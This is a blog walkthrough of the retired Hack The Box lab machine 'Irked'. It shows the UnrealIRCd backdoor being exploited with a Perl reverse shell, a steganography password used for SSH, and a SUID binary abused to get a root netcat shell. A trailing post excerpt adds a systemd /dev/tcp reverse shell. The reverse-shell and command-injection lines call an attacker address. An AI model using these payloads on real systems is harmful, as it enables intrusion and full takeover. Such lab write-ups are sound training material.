Skip to main content

HacktheBox.eu - Irked - Update

HacktheBox.eu - Irked - Update




Recon

Let's use threader3000 for our recon scan. It's a threaded scanner written in python that does a super quick up/down scan on all TCP ports, then suggests a nmap scan based on the results. It will automatically save the nmap scan results as XML, then we can convert it to HTML


xsltproc ./irked.htb/irked.htb.xml -o ./irked.html



We've got a goodly amount of ports open to us on this box


22,80,111,6697,8067,55015,65534


We can see 22 is OpenSSH 6.7p1


80 is Apache 2.4.10

111 & 55015 both say RPC

And the others say UnreallRCd…. Whatever that is, Lets start on port 80 and see what it shows us.



An angry face with "IRC is almost working!"


If we run dirb we will find some default apache pages but not much else to go on


What is that UnreallRCD?


https://www.unrealircd.org/



Oh it's an IRC server… that makes sense.


If we google UnrealRCD and exploit, there appears to be a backdoor in some versions although we don't know what specific version this is, it seems like a pretty easy exploit to test.





Exploit


https://metalkey.github.io/unrealircd-3281-backdoor-command-execution.html


So we just need to type "AB" and we can get code execution?


Ok. Let's follow along the blog but with a perl reverse tcp shell instead.


Let's start by generation our perl Reverse shell


msfvenom  -p cmd/unix/reverse_perl LHOST=10.10.14.13 LPORT=5555 


Which give us this output.


perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.13:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'



So now we just need to stick AB; in front of it.


AB;perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.13:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'


Let's set up our netcat listener in case it it works


nc -lnvp 5555



And If we pick any of the irc ports and netcat to them we are met with this just like in the blog



Paste in our backdoor.


And we caught our reverse shell.



But the shell is kinda bad let's see if we have python installed and upgrade this shell



python -c 'import pty; pty.spawn("/bin/bash")'




Better





If we poke around in some folder we eventually come to the /home/djmarov/Documents/


Folder in here is a file named .backup and a user.txt file we don't yet have access to.


If we read the contents of .backup we see this.


Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss



Two things here …. That looks like the konami code ( not really important), but this also says this is a password for something hidden inside a file with steganography.


The only file we have seen so far is that irked face on the default webpage.


Let's save a copy of it to our kali box.


I named mine irked.txt 


If we use steghide to try to extract anything hidden the command would be


steghide extract -sf ./index.jpeg 


And it looks like there was something there.



Let's check it out

Cat pass.txt
Kab6h+m+bbp2J:HG


Ok so it seems like this is a password for something and considering we found the key in the djmardov folder We could guess that it is their password. 


Let's try to ssh as djmardov now


ssh djmardov@irked.htb




And now we can read the user.txt from /home/djmardov/Documents/user.txt



Now we need to figure out a path to root


Let's use updog and wget to copy over linpeas to irked to see if we can find a path forward.


On kali we start updog just by typing'



updog


And it will server anything that is in the folder that it was started from default is port 9090


Let's make a new folder on irked to download this into


mkdir /tmp/circusmonkey



Then we need to give it execution rights


chmod +x ./linpeas.sh



And we see this interesting SUID that is normally not on boxes..


/usr/bin/viewuser


What does that do?



Looks like its  trying to read something from /tmp/listusers…


But that file doesn't exist….


So let's make it 


echo "whoami" > /tmp/listusers
chmod 777 /tmp/listusers



And then run /usr/bin/viewusers



Cool looks like we have the results of whoami here…. Which means we can put anything we want in that temp folder and it should run it as root.


So let's get a shell as root


Let's start by setting up another listener on our kalibox


nc -lncp 5566



Then on irked we will send our nc connection command to the listusers file


echo "nc 10.10.14.13 5566 -e /bin/sh" > /tmp/listusers


Now if we run /usr/bin/viewuser again hopefully we catch a shell as root.



/usr/bin/viewuser


And there we go, we are root, and now we can get the root flag.





Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more